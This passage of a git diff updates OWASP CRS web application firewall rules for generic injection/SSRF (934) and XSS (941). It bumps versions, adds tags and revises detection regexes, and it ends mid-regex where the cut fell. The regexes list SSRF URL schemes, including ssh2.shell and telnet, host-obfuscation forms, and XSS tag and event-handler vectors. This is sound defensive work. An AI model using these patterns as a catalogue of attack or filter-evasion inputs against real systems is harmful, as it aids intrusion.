@@ -134,8 +135,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-injection-generic',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-GENERIC',\
     tag:'capec/1/180/77',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
@@ -166,8 +168,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-injection-generic',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-GENERIC',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -197,8 +200,9 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'attack-injection-generic',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-GENERIC',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
@@ -227,14 +231,15 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'attack-ssrf',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-GENERIC',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -255,8 +260,9 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'attack-injection-generic',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-GENERIC',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
@@ -293,7 +299,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 934120
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)((?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[0-9]{10}|(?:0x[0-9a-f]{2}\.){3}0x[0-9a-f]{2}|0x(?:[0-9a-f]{8}|[0-9a-f]{16})|(?:0{1,4}[0-9]{1,3}\.){3}0{1,4}[0-9]{1,3}|[0-9]{1,3}\.(?:[0-9]{1,3}\.[0-9]{5}|[0-9]{8})|(?:\x5c\x5c[\-0-9a-z]\.?_?)+|\[[0-:a-f]+(?:[\.0-9]+|%[0-9A-Z_a-z]+)?\]|[a-z][\-\.0-9A-Z_a-z]{1,255}:[0-9]{1,5}(?:#?[\s\x0b]*&?@(?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}|[a-z][\-\.0-9A-Z_a-z]{1,255}):[0-9]{1,5}/?)+|[\.0-9]{0,11}(?:\xe2(?:\x91[\xa0-\xbf]|\x92[\x80-\xbf]|\x93[\x80-\xa9\xab-\xbf])|\xe3\x80\x82)+))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[0-9]{10}|(?:0x[0-9a-f]{2}\.){3}0x[0-9a-f]{2}|0x(?:[0-9a-f]{8}|[0-9a-f]{16})|(?:0{1,4}[0-9]{1,3}\.){3}0{1,4}[0-9]{1,3}|[0-9]{1,3}\.(?:[0-9]{1,3}\.[0-9]{5}|[0-9]{8})|(?:\x5c\x5c[\-0-9a-z]\.?_?)+|\[[0-:a-f]+(?:[\.0-9]+|%[0-9A-Z_a-z]+)?\]|[a-z][\-\.0-9A-Z_a-z]{1,255}:[0-9]{1,5}(?:#?[\s\x0b]*&?@(?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}|[a-z][\-\.0-9A-Z_a-z]{1,255}):[0-9]{1,5}/?)+|[\.0-9]{0,11}(?:\x{e2}(?:\x91[\xa0-\x{bf}]|\x92[\x80-\x{bf}]|\x93[\x80-\x{a9}\x{ab}-\x{bf}])|\x{e3}\x80\x82)+)" \
     "id:934120,\
     phase:2,\
     block,\
@@ -307,8 +313,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'attack-ssrf',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-GENERIC',\
     tag:'capec/1000/225/664',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -339,21 +346,22 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-injection-generic',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-GENERIC',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
index d6a1abaf2..a27d3fbfe 100644
--- a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
+++ b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -14,8 +14,8 @@
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -61,8 +61,9 @@ SecRule REQUEST_FILENAME "!@validateByteRange 20, 45-47, 48-57, 65-90, 95, 97-12
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     ctl:ruleRemoveTargetByTag=xss-perf-disable;REQUEST_FILENAME,\
-    ver:'OWASP_CRS/4.6.0'"
+    ver:'OWASP_CRS/4.15.0-dev'"
 
 
 #
@@ -93,8 +94,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -120,8 +122,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -135,7 +138,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 941130
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i).(?:\b(?:x(?:link:href|html|mlns)|data:text/html|formaction|pattern\b.*?=)|!ENTITY[\s\x0b]+(?:%[\s\x0b]+)?[^\s\x0b]+[\s\x0b]+(?:SYSTEM|PUBLIC)|@import|;base64)\b" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i).(?:\b(?:(?:x(?:link:href|html|mlns)|data:text/html|formaction)\b|pattern[\s\x0b]*=)|(?:!ENTITY[\s\x0b]+(?:%[\s\x0b]+)?[^\s\x0b]+[\s\x0b]+(?:SYSTEM|PUBLIC)|@import|;base64)\b)" \
     "id:941130,\
     phase:2,\
     block,\
@@ -150,8 +153,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -179,8 +183,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'xss-perf-disable',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-XSS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -197,7 +202,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 941160
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)<[^0-9<>A-Z_a-z]*(?:[^\s\x0b\"'<>]*:)?[^0-9<>A-Z_a-z]*[^0-9A-Z_a-z]*?(?:s[^0-9A-Z_a-z]*?(?:c[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?t|t[^0-9A-Z_a-z]*?y[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e|v[^0-9A-Z_a-z]*?g|e[^0-9A-Z_a-z]*?t[^0-9>A-Z_a-z])|f[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?m|d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?g|m[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?q[^0-9A-Z_a-z]*?u[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?e|e[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?a[^0-9>A-Z_a-z])|(?:l[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?k|o[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?j[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?c[^0-9A-Z_a-z]*?t|e[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?d|a[^0-9A-Z_a-z]*?(?:p[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?t|u[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?o|n[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?e)|p[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m|i?[^0-9A-Z_a-z]*?f[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?e|b[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?s[^0-9A-Z_a-z]*?e|o[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?y|i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?s)|i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a?[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?e?|v[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?o)[^0-9>A-Z_a-z])|(?:<[0-9A-Z_a-z].*[\s\x0b/]|[\"'](?:.*[\s\x0b/])?)(?:background|formaction|lowsrc|on(?:a(?:bort|ctivate|d(?:apteradded|dtrack)|fter(?:print|(?:scriptexecu|upda)te)|lerting|n(?:imation(?:cancel|end|iteration|start)|tennastatechange)|ppcommand|u(?:dio(?:end|process|start)|xclick))|b(?:e(?:fore(?:(?:(?:(?:de)?activa|scriptexecu)t|toggl)e|c(?:opy|ut)|editfocus|input|p(?:aste|rint)|u(?:nload|pdate))|gin(?:Event)?)|l(?:ocked|ur)|oun(?:ce|dary)|roadcast|usy)|c(?:a(?:(?:ch|llschang)ed|nplay(?:through)?|rdstatechange)|(?:ell|fstate)change|h(?:a(?:rging(?:time)?cha)?nge|ecking)|l(?:ick|ose)|o(?:m(?:mand(?:update)?|p(?:lete|osition(?:end|start|update)))|n(?:nect(?:ed|ing)|t(?:extmenu|rolselect))|py)|u(?:echange|t))|d(?:ata(?:(?:availabl|chang)e|error|setc(?:hanged|omplete))|blclick|e(?:activate|livery(?:error|success)|vice(?:found|light|(?:mo|orienta)tion|proximity))|i(?:aling|s(?:abled|c(?:hargingtimechange|onnect(?:ed|ing))))|o(?:m(?:a(?:ctivate|ttrmodified)|(?:characterdata|subtree)modified|focus(?:in|out)|mousescroll|node(?:inserted(?:intodocument)?|removed(?:fromdocument)?))|wnloading)|r(?:ag(?:drop|e(?:n(?:d|ter)|xit)|(?:gestur|leav)e|over|start)|op)|urationchange)|e(?:mptied|n(?:abled|d(?:ed|Event)?|ter)|rror(?:update)?|xit)|f(?:ailed|i(?:lterchange|nish)|o(?:cus(?:in|out)?|rm(?:change|input))|ullscreenchange)|g(?:amepad(?:axismove|button(?:down|up)|(?:dis)?connected)|et)|h(?:ashchange|e(?:adphoneschange|l[dp])|olding)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|put|valid))|key(?:down|press|up)|l(?:evelchange|o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|y)|m(?:ark|essage|o(?:use(?:down|enter|(?:lea|mo)ve|o(?:ut|ver)|up|wheel)|ve(?:end|start)?|z(?:a(?:fterpaint|udioavailable)|(?:beforeresiz|orientationchang|t(?:apgestur|imechang))e|(?:edgeui(?:c(?:ancel|omplet)|start)e|network(?:down|up)loa)d|fullscreen(?:change|error)|m(?:agnifygesture(?:start|update)?|ouse(?:hittest|pixelscroll))|p(?:ointerlock(?:change|error)|resstapgesture)|rotategesture(?:start|update)?|s(?:crolledareachanged|wipegesture(?:end|start|update)?))))|no(?:match|update)|o(?:(?:bsolet|(?:ff|n)lin)e|pen|verflow(?:changed)?)|p(?:a(?:ge(?:hide|show)|int|(?:st|us)e)|lay(?:ing)?|o(?:inter(?:down|enter|(?:(?:lea|mo)v|rawupdat)e|o(?:ut|ver)|up)|p(?:state|up(?:hid(?:den|ing)|show(?:ing|n))))|ro(?:gress|pertychange))|r(?:atechange|e(?:adystatechange|ceived|movetrack|peat(?:Event)?|quest|s(?:et|ize|u(?:lt|m(?:e|ing)))|trieving)|ow(?:e(?:nter|xit)|s(?:delete|inserted)))|s(?:croll(?:end)?|e(?:arch|ek(?:complete|ed|ing)|lect(?:ionchange|start)?|n(?:ding|t)|t)|how|(?:ound|peech)(?:end|start)|t(?:a(?:lled|rt|t(?:echange|uschanged))|k(?:comma|sessione)nd|op)|u(?:bmit|ccess|spend)|vg(?:abort|error|(?:un)?load|resize|scroll|zoom))|t(?:ext|ime(?:out|update)|o(?:ggle|uch(?:cancel|en(?:d|ter)|(?:lea|mo)ve|start))|ransition(?:cancel|end|run|start))|u(?:n(?:derflow|handledrejection|load)|p(?:dateready|gradeneeded)|s(?:erproximity|sdreceived))|v(?:ersion|o(?:ic|lum)e)change|w(?:a(?:it|rn)ing|ebkit(?:animation(?:end|iteration|start)|transitionend)|heel)|zoom)|ping|s(?:rc|tyle))[\x08-\n\f\r ]*?=" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)<[^0-9<>A-Z_a-z]*(?:[^\s\x0b\"'<>]*:)?[^0-9<>A-Z_a-z]*[^0-9A-Z_a-z]*?(?:s[^0-9A-Z_a-z]*?(?:c[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?t|t[^0-9A-Z_a-z]*?y[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e|v[^0-9A-Z_a-z]*?g|e[^0-9A-Z_a-z]*?t[^0-9>A-Z_a-z])|f[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?m|d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?g|m[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?q[^0-9A-Z_a-z]*?u[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?e|e[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?a[^0-9>A-Z_a-z])|(?:l[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?k|o[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?j[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?c[^0-9A-Z_a-z]*?t|e[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?d|a[^0-9A-Z_a-z]*?(?:p[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?t|u[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?o|n[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?e)|p[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m|i?[^0-9A-Z_a-z]*?f[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?e|b[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?s[^0-9A-Z_a-z]*?e|o[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?y|i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?s)|i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a?[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?e?|v[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?o)[^0-9>A-Z_a-z])|(?:<[0-9A-Z_a-z].*[\s\x0b/]|[\"'](?:.*[\s\x0b/])?)(?:background|formaction|lowsrc|on(?:a(?:bort|ctivate|d(?:apteradded|dtrack)|fter(?:print|(?:scriptexecu|upda)te)|lerting|n(?:imation(?:cancel|end|iteration|start)|tennastatechange)|ppcommand|u(?:dio(?:end|process|start)|xclick))|b(?:e(?:fore(?:(?:(?:(?:de)?activa|scriptexecu)t|toggl)e|c(?:opy|ut)|editfocus|input|p(?:aste|rint)|u(?:nload|pdate))|gin(?:Event)?)|l(?:ocked|ur)|oun(?:ce|dary)|roadcast|usy)|c(?:a(?:(?:ch|llschang)ed|nplay(?:through)?|rdstatechange)|(?:ell|fstate)change|h(?:a(?:rging(?:time)?cha)?nge|ecking)|l(?:ick|ose)|o(?:m(?:mand(?:update)?|p(?:lete|osition(?:end|start|update)))|n(?:nect(?:ed|ing)|t(?:extmenu|rolselect))|py)|u(?:echange|t))|d(?:ata(?:(?:availabl|chang)e|error|setc(?:hanged|omplete))|blclick|e(?:activate|livery(?:error|success)|vice(?:found|light|(?:mo|orienta)tion|proximity))|i(